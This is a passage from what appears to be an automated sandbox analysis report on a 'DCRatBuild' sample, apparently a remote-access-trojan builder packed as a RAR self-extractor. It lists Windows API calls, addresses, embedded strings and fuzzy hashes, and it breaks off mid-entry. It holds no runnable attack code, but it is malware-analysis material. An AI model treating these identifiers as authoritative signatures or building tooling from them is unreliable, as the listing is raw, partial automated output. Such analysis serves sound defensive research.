                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      APIs
                      • _swprintf.LIBCMT ref: 00D6DABE
                        • Part of subcall function 00D6400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D6401D
                        • Part of subcall function 00D71596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00DA0EE8,00000200,00D6D202,00000000,?,00000050,00DA0EE8), ref: 00D715B3
                      • _strlen.LIBCMT ref: 00D6DADF
                      • SetDlgItemTextW.USER32(?,00D9E154,?), ref: 00D6DB3F
                      • GetWindowRect.USER32(?,?), ref: 00D6DB79
                      • GetClientRect.USER32(?,?), ref: 00D6DB85
                      • GetWindowLongW.USER32(?,000000F0), ref: 00D6DC25
                      • GetWindowRect.USER32(?,?), ref: 00D6DC52
                      • SetWindowTextW.USER32(?,?), ref: 00D6DC95
                      • GetSystemMetrics.USER32(00000008), ref: 00D6DC9D
                      • GetWindow.USER32(?,00000005), ref: 00D6DCA8
                      • GetWindowRect.USER32(00000000,?), ref: 00D6DCD5
                      • GetWindow.USER32(00000000,00000002), ref: 00D6DD47
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                      • String ID: $%s:$CAPTION$d
                      • API String ID: 2407758923-2512411981
                      APIs
                      • ___free_lconv_mon.LIBCMT ref: 00D8C277
                        • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BE2F
                        • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BE41
                        • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BE53
                        • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BE65
                        • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BE77
                        • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BE89
                        • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BE9B
                        • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BEAD
                        • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BEBF
                        • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BED1
                        • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BEE3
                        • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BEF5
                        • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BF07
                      • _free.LIBCMT ref: 00D8C26C
                        • Part of subcall function 00D884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8BFA7,00D93958,00000000,00D93958,00000000,?,00D8BFCE,00D93958,00000007,00D93958,?,00D8C3CB,00D93958), ref: 00D884F4
                        • Part of subcall function 00D884DE: GetLastError.KERNEL32(00D93958,?,00D8BFA7,00D93958,00000000,00D93958,00000000,?,00D8BFCE,00D93958,00000007,00D93958,?,00D8C3CB,00D93958,00D93958), ref: 00D88506
                      • _free.LIBCMT ref: 00D8C28E
                      • _free.LIBCMT ref: 00D8C2A3
                      • _free.LIBCMT ref: 00D8C2AE
                      • _free.LIBCMT ref: 00D8C2D0
                      • _free.LIBCMT ref: 00D8C2E3
                      • _free.LIBCMT ref: 00D8C2F1
                      • _free.LIBCMT ref: 00D8C2FC
                      • _free.LIBCMT ref: 00D8C334
                      • _free.LIBCMT ref: 00D8C33B
                      • _free.LIBCMT ref: 00D8C358
                      • _free.LIBCMT ref: 00D8C370
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                      • String ID:
                      • API String ID: 161543041-0
                      APIs
                      • GetWindow.USER32(?,00000005), ref: 00D7CD51
                      • GetClassNameW.USER32(00000000,?,00000800), ref: 00D7CD7D
                        • Part of subcall function 00D717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00D6BB05,00000000,.exe,?,?,00000800,?,?,00D785DF,?), ref: 00D717C2
                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00D7CD99
                      • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00D7CDB0
                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00D7CDC4
                      • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00D7CDED
                      • DeleteObject.GDI32(00000000), ref: 00D7CDF4
                      • GetWindow.USER32(00000000,00000002), ref: 00D7CDFD
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                      • String ID: STATIC
                      • API String ID: 3820355801-1882779555
                      APIs
                      • _free.LIBCMT ref: 00D88EC5
                        • Part of subcall function 00D884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8BFA7,00D93958,00000000,00D93958,00000000,?,00D8BFCE,00D93958,00000007,00D93958,?,00D8C3CB,00D93958), ref: 00D884F4
                        • Part of subcall function 00D884DE: GetLastError.KERNEL32(00D93958,?,00D8BFA7,00D93958,00000000,00D93958,00000000,?,00D8BFCE,00D93958,00000007,00D93958,?,00D8C3CB,00D93958,00D93958), ref: 00D88506
                      • _free.LIBCMT ref: 00D88ED1
                      • _free.LIBCMT ref: 00D88EDC
                      • _free.LIBCMT ref: 00D88EE7
                      • _free.LIBCMT ref: 00D88EF2
                      • _free.LIBCMT ref: 00D88EFD
                      • _free.LIBCMT ref: 00D88F08
                      • _free.LIBCMT ref: 00D88F13
                      • _free.LIBCMT ref: 00D88F1E
                      • _free.LIBCMT ref: 00D88F2C
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID: ;%u$x%u$xc%u
                      • API String ID: 0-2277559157
                      APIs
                        • Part of subcall function 00D6130B: GetDlgItem.USER32(00000000,00003021), ref: 00D6134F
                        • Part of subcall function 00D6130B: SetWindowTextW.USER32(00000000,00D935B4), ref: 00D61365
                      • EndDialog.USER32(?,00000001), ref: 00D7AD20
                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 00D7AD47
                      • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00D7AD60
                      • SetWindowTextW.USER32(?,?), ref: 00D7AD71
                      • GetDlgItem.USER32(?,00000065), ref: 00D7AD7A
                      • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00D7AD8E
                      • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00D7ADA4
                      Similarity
                      • API ID: MessageSend$Item$TextWindow$Dialog
                      • String ID: LICENSEDLG
                      • API String ID: 3214253823-2177901306
                      • Opcode ID: 2d4e35d637f849439215cbb3adc8abba8cb2f6c027477652a47dac3005a02dfa
                      • Instruction ID: 12b61c3378df4f9961a679d4c158f9cb0c5c93a7478961a39c82a3bdc1bf2ac3
                      • Opcode Fuzzy Hash: 2d4e35d637f849439215cbb3adc8abba8cb2f6c027477652a47dac3005a02dfa
                      • Instruction Fuzzy Hash: 7921D632244306BBD2315F69EC49E7F3F6CFB8AB46F054015F609D26A0FB519901E632
                      APIs
                      • __EH_prolog.LIBCMT ref: 00D69448
                      • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00D6946B
                      • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00D6948A
                        • Part of subcall function 00D717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00D6BB05,00000000,.exe,?,?,00000800,?,?,00D785DF,?), ref: 00D717C2
                      • _swprintf.LIBCMT ref: 00D69526
                        • Part of subcall function 00D6400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D6401D
                      • MoveFileW.KERNEL32(?,?), ref: 00D69595
                      • MoveFileW.KERNEL32(?,?), ref: 00D695D5
                      Similarity
                      • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                      • String ID: rtmp%d
                      • API String ID: 2111052971-3303766350
                      • Opcode ID: f34aab2d915b1eabfe590eee463f085bb9a0e43db0955372fd835c388de8e0ba
                      • Instruction ID: b95f8ef078a0d0eb75ac830d36de25307219049d4bc8303f19dc7405de3a5c3c
                      • Opcode Fuzzy Hash: f34aab2d915b1eabfe590eee463f085bb9a0e43db0955372fd835c388de8e0ba
                      • Instruction Fuzzy Hash: 23413A71900258A7CF20EBA4CD95AEEB77CEF15380F0444E6B549E3142EB749B89CA74
                      APIs
                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00D78F38
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00D78F59
                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00D78F80
                      Similarity
                      • API ID: Global$AllocByteCharCreateMultiStreamWide
                      • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                      • API String ID: 4094277203-4209811716
                      • Opcode ID: b5c5814ccaff3d4bc4f3cc55a85f37eb959e4db45329a2a8b1efd2efccca0a67
                      • Instruction ID: 56ea898eb27f1b405496711ec7649006458937e3ca5d322ebae33b4be2c36a88
                      • Opcode Fuzzy Hash: b5c5814ccaff3d4bc4f3cc55a85f37eb959e4db45329a2a8b1efd2efccca0a67
                      • Instruction Fuzzy Hash: 3C312A315483117FDB24BB649C4AF6FB768EF41720F14811AF809A61D2FF649A0993B1
                      APIs
                      • __aulldiv.LIBCMT ref: 00D70A9D
                        • Part of subcall function 00D6ACF5: GetVersionExW.KERNEL32(?), ref: 00D6AD1A
                      • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00D70AC0
                      • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00D70AD2
                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00D70AE3
                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D70AF3
                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D70B03
                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D70B3D
                      • __aullrem.LIBCMT ref: 00D70BCB
                      Similarity
                      • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                      • String ID:
                      • API String ID: 1247370737-0
                      • Opcode ID: e542c2159fb6719d17ba4cf4adf29d78fc1477b8305a64b12469db995ddd6e0b
                      • Instruction ID: 808e661694c1ff96392cbce8496cd9c98403f782882dafc32671e27e3ae14dc8
                      • Opcode Fuzzy Hash: e542c2159fb6719d17ba4cf4adf29d78fc1477b8305a64b12469db995ddd6e0b
                      • Instruction Fuzzy Hash: 8B4119B5408306DFC710DF65C88496BFBF8FB88714F048A2EF59692650E735E649CB61
                      APIs
                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00D8F5A2,?,00000000,?,00000000,00000000), ref: 00D8EE6F
                      • __fassign.LIBCMT ref: 00D8EEEA
                      • __fassign.LIBCMT ref: 00D8EF05
                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00D8EF2B
                      • WriteFile.KERNEL32(?,?,00000000,00D8F5A2,00000000,?,?,?,?,?,?,?,?,?,00D8F5A2,?), ref: 00D8EF4A
                      • WriteFile.KERNEL32(?,?,00000001,00D8F5A2,00000000,?,?,?,?,?,?,?,?,?,00D8F5A2,?), ref: 00D8EF83
                      Similarity
                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                      • String ID:
                      • API String ID: 1324828854-0
                      • Opcode ID: 5f572e52770e7976444d9ca203d164716765fa16ded71458868ea9ce7a3a015a
                      • Instruction ID: 532965abf55d4ccf61c6b592921fbc5b4a68323437825c77fa6ac3401b6e99e1
                      • Opcode Fuzzy Hash: 5f572e52770e7976444d9ca203d164716765fa16ded71458868ea9ce7a3a015a
                      • Instruction Fuzzy Hash: 0451B375A00209AFDB10DFA8D885AEEFBF9EF09310F18451AE555E7291E7309941CF70
                      APIs
                      • GetTempPathW.KERNEL32(00000800,?), ref: 00D7C54A
                      • _swprintf.LIBCMT ref: 00D7C57E
                        • Part of subcall function 00D6400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D6401D
                      • SetDlgItemTextW.USER32(?,00000066,00DA946A), ref: 00D7C59E
                      • _wcschr.LIBVCRUNTIME ref: 00D7C5D1
                      • EndDialog.USER32(?,00000001), ref: 00D7C6B2
                      Similarity
                      • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                      • String ID: %s%s%u
                      • API String ID: 2892007947-1360425832
                      • Opcode ID: 65a6795e3ec7705d3aea1f37709e98ce772275fa0cd9bfff84f735f0b5858fff
                      • Instruction ID: 2a9e2a8345c726b48062816c6f9c237d225f27a078b9f68fdae7d6d60a6ed344
                      • Opcode Fuzzy Hash: 65a6795e3ec7705d3aea1f37709e98ce772275fa0cd9bfff84f735f0b5858fff
                      • Instruction Fuzzy Hash: B941C271910618AEDB22DBA0DC85EEA77BCEB09701F0490A6E50DE6160F7719BC4CB70
                      APIs
                      • ShowWindow.USER32(?,00000000), ref: 00D7964E
                      • GetWindowRect.USER32(?,00000000), ref: 00D79693
                      • ShowWindow.USER32(?,00000005,00000000), ref: 00D7972A
                      • SetWindowTextW.USER32(?,00000000), ref: 00D79732
                      • ShowWindow.USER32(00000000,00000005), ref: 00D79748
                      Similarity
                      • API ID: Window$Show$RectText
                      • String ID: RarHtmlClassName
                      • API String ID: 3937224194-1658105358
                      • Opcode ID: 45f31c91ce21e714a627fb1594b4737829f2916979b3c8280211bea22ee4c6f2
                      • Instruction ID: a22c8c926259e01866697c93bd7260e6c0bbf12f88f2ea76c1df1de6e3cef535
                      • Opcode Fuzzy Hash: 45f31c91ce21e714a627fb1594b4737829f2916979b3c8280211bea22ee4c6f2
                      • Instruction Fuzzy Hash: EF31AD32004301AFCB25AF64DC49F6BBBA8EF48711F088559FA4D9A262EB34D905CB71
                      APIs
                        • Part of subcall function 00D8BF79: _free.LIBCMT ref: 00D8BFA2
                      • _free.LIBCMT ref: 00D8C003
                        • Part of subcall function 00D884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8BFA7,00D93958,00000000,00D93958,00000000,?,00D8BFCE,00D93958,00000007,00D93958,?,00D8C3CB,00D93958), ref: 00D884F4
                        • Part of subcall function 00D884DE: GetLastError.KERNEL32(00D93958,?,00D8BFA7,00D93958,00000000,00D93958,00000000,?,00D8BFCE,00D93958,00000007,00D93958,?,00D8C3CB,00D93958,00D93958), ref: 00D88506
                      • _free.LIBCMT ref: 00D8C00E
                      • _free.LIBCMT ref: 00D8C019
                      • _free.LIBCMT ref: 00D8C06D
                      • _free.LIBCMT ref: 00D8C078
                      • _free.LIBCMT ref: 00D8C083
                      • _free.LIBCMT ref: 00D8C08E
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                      • Instruction ID: 24080eac5913b0e24b21dc5bc522bfb7bd2588c7ee959b8a1b675921eaf11cb1
                      • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                      • Instruction Fuzzy Hash: 741112B2540B44F6D620BBB0CC07FCBB79DEF04710F408856B39966452DB66F9049BB4
                      APIs
                      • GetLastError.KERNEL32(?,?,00D820C1,00D7FB12), ref: 00D820D8
                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D820E6
                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D820FF
                      • SetLastError.KERNEL32(00000000,?,00D820C1,00D7FB12), ref: 00D82151
                      Similarity
                      • API ID: ErrorLastValue___vcrt_
                      • String ID:
                      • API String ID: 3852720340-0
                      • Opcode ID: 669e2bd1121dbe5c246c032c2e66d0a1e3fb9cbc69622781925098cfd45e57d6
                      • Instruction ID: be0a174f10fdc03735955a43db90d355221366936be38b2efe15accb6c6eb36e
                      • Opcode Fuzzy Hash: 669e2bd1121dbe5c246c032c2e66d0a1e3fb9cbc69622781925098cfd45e57d6
                      • Instruction Fuzzy Hash: F001AC32109711AEF7543BB5BC8993B2B45EB21B747350A2BF218952E1EF614D019374
                      Similarity
                      • API ID:
                      • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                      • API String ID: 0-1718035505
                      • Opcode ID: f0be2fc0ff69939f3fc08808ec0ffb5b7cbea050289720b985426161878f34a8
                      • Instruction ID: 5da77717c8d5d1ff1e579263b1765e620a4cb424fe204054418e2bfe5df3041a
                      • Opcode Fuzzy Hash: f0be2fc0ff69939f3fc08808ec0ffb5b7cbea050289720b985426161878f34a8
                      • Instruction Fuzzy Hash: B001F4316413239B4F725E756D816A637B6AE85312328817BE64DD3300FAB2C885D7F0
                      APIs
                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D70D0D
                        • Part of subcall function 00D6ACF5: GetVersionExW.KERNEL32(?), ref: 00D6AD1A
                      • LocalFileTimeToFileTime.KERNEL32(?,00D70CB8), ref: 00D70D31
                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D70D47
                      • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00D70D56
                      • SystemTimeToFileTime.KERNEL32(?,00D70CB8), ref: 00D70D64
                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D70D72
                      Similarity
                      • API ID: Time$File$System$Local$SpecificVersion
                      • String ID:
                      • API String ID: 2092733347-0
                      • Opcode ID: cda96ba12f147dd5d4dd3a4918f39060b45d7ee8041a77b11ea997620346a195
                      • Instruction ID: 14fce58203a712297c9f764f5d0c60112c7402f9039dcd74c5e5499f89270c92
                      • Opcode Fuzzy Hash: cda96ba12f147dd5d4dd3a4918f39060b45d7ee8041a77b11ea997620346a195
                      • Instruction Fuzzy Hash: 6631C67A90020AEBCB10DFE5D8859EFBBBCFF58700B04455AE959E3610E730AA45CB75
                      Similarity
                      • API ID: _memcmp
                      • String ID:
                      • API String ID: 2931989736-0
                      • Opcode ID: ac245c3e15898c35e9b4fdd3e0b19754c739d500de77432ccade97dba745bcd0
                      • Instruction ID: 01c5d12b83af5666628fb9dd2b3930ee1a64bd07c3893d033399f1255c7dd171
                      • Opcode Fuzzy Hash: ac245c3e15898c35e9b4fdd3e0b19754c739d500de77432ccade97dba745bcd0
                      • Instruction Fuzzy Hash: CD21817260020EBBDB15AB20DC91E2BB7ADEB51784B54C129FC4D9A206F270ED4587B4
                      APIs
                      • GetLastError.KERNEL32(?,00DA0EE8,00D83E14,00DA0EE8,?,?,00D83713,00000050,?,00DA0EE8,00000200), ref: 00D88FA9
                      • _free.LIBCMT ref: 00D88FDC
                      • _free.LIBCMT ref: 00D89004
                      • SetLastError.KERNEL32(00000000,?,00DA0EE8,00000200), ref: 00D89011
                      • SetLastError.KERNEL32(00000000,?,00DA0EE8,00000200), ref: 00D8901D
                      • _abort.LIBCMT ref: 00D89023
                      Similarity
                      • API ID: ErrorLast$_free$_abort
                      • String ID:
                      • API String ID: 3160817290-0
                      • Opcode ID: fa70e3b3e726ab371fc6551cdf5896ef4ff1ac654de1e504cc53d36f70f0f080
                      • Instruction ID: a4ef3c61c22eb30f795148dbe837b7956e18becf4bc8d274b8238a5d65c7a325
                      • Opcode Fuzzy Hash: fa70e3b3e726ab371fc6551cdf5896ef4ff1ac654de1e504cc53d36f70f0f080
                      • Instruction Fuzzy Hash: E1F02236504B116AC22277286C0AF3B2B2ADFC1761F6C011AF659E2296EF20CD02B335
                      APIs
                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00D7D2F2
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D7D30C
                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D7D31D
                      • TranslateMessage.USER32(?), ref: 00D7D327
                      • DispatchMessageW.USER32(?), ref: 00D7D331
                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00D7D33C
                      Similarity
                      • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                      • String ID:
                      • API String ID: 2148572870-0
                      • Opcode ID: 752ce509fdae00c3ccb6aa702859ff916c8821f37127ed0f48fc874e2bf77393
                      • Instruction ID: d20bb52081f12802cf3340757c17bb8117396e9db3cc24f9df5413a8b8f5485a
                      • Opcode Fuzzy Hash: 752ce509fdae00c3ccb6aa702859ff916c8821f37127ed0f48fc874e2bf77393
                      • Instruction Fuzzy Hash: 38F0EC72A0121AABCB205BA5DC4CEEBBF7EEF527A1F048012F64AD2150E6359541D7F1
                      APIs
                      • _wcschr.LIBVCRUNTIME ref: 00D7C435
                        • Part of subcall function 00D717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00D6BB05,00000000,.exe,?,?,00000800,?,?,00D785DF,?), ref: 00D717C2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: CompareString_wcschr
                      • String ID: <$HIDE$MAX$MIN
                      • API String ID: 2548945186-3358265660
                      • Opcode ID: 296d305e4db53870c4e630c75d4cade76b5bdbeb3ea9d31f936065aefabe3fbe
                      • Instruction ID: cddcdfff26dbbffab27b6530e3cd9a0af4e9afce998b8a65d85611a3797203f0
                      • Opcode Fuzzy Hash: 296d305e4db53870c4e630c75d4cade76b5bdbeb3ea9d31f936065aefabe3fbe
                      • Instruction Fuzzy Hash: 69318076910609AEDF25DA54DC51EEE77BCEB54304F0080AAFA0DD6190FBB19AC48B70
                      APIs
                      • LoadBitmapW.USER32(00000065), ref: 00D7ADFD
                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00D7AE22
                      • DeleteObject.GDI32(00000000), ref: 00D7AE54
                      • DeleteObject.GDI32(00000000), ref: 00D7AE77
                        • Part of subcall function 00D79E1C: FindResourceW.KERNEL32(00D7AE4D,PNG,?,?,?,00D7AE4D,00000066), ref: 00D79E2E
                        • Part of subcall function 00D79E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,00D7AE4D,00000066), ref: 00D79E46
                        • Part of subcall function 00D79E1C: LoadResource.KERNEL32(00000000,?,?,?,00D7AE4D,00000066), ref: 00D79E59
                        • Part of subcall function 00D79E1C: LockResource.KERNEL32(00000000,?,?,?,00D7AE4D,00000066), ref: 00D79E64
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                      • String ID: ]
                      • API String ID: 142272564-3352871620
                      • Opcode ID: 35e6dc4fc9eb043d3c2b51b8d19b4ad318d5145e06010545b9193a033bb53c7e
                      • Instruction ID: 3f7aa01555fdc72ffdc2dc26a5d70ed91bc273553177edade2e71a2bcbe17aa6
                      • Opcode Fuzzy Hash: 35e6dc4fc9eb043d3c2b51b8d19b4ad318d5145e06010545b9193a033bb53c7e
                      • Instruction Fuzzy Hash: F401C433640316A6C71067689C16E7FBB6AEBC1B52F088015FD08E7291EA718C1596B2
                      APIs
                        • Part of subcall function 00D6130B: GetDlgItem.USER32(00000000,00003021), ref: 00D6134F
                        • Part of subcall function 00D6130B: SetWindowTextW.USER32(00000000,00D935B4), ref: 00D61365
                      • EndDialog.USER32(?,00000001), ref: 00D7CCDB
                      • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00D7CCF1
                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 00D7CD05
                      • SetDlgItemTextW.USER32(?,00000068), ref: 00D7CD14
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ItemText$DialogWindow
                      • String ID: RENAMEDLG
                      • API String ID: 445417207-3299779563
                      • Opcode ID: 4b5da50913fbc1179fd6569e54576b1f6b0b8c44478a681c58398049e44c428f
                      • Instruction ID: 681e6dfd1703c0f329b4772ded3b322555ab757683c14ac7c8d13a11dd004106
                      • Opcode Fuzzy Hash: 4b5da50913fbc1179fd6569e54576b1f6b0b8c44478a681c58398049e44c428f
                      • Instruction Fuzzy Hash: 13019C33294312BFD2224F259C08FA73B5CEB4A702F148019F38EE21E1D7A19804C731
                      APIs
                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D87573,00000000,?,00D87513,00000000,00D9BAD8,0000000C,00D8766A,00000000,00000002), ref: 00D875E2
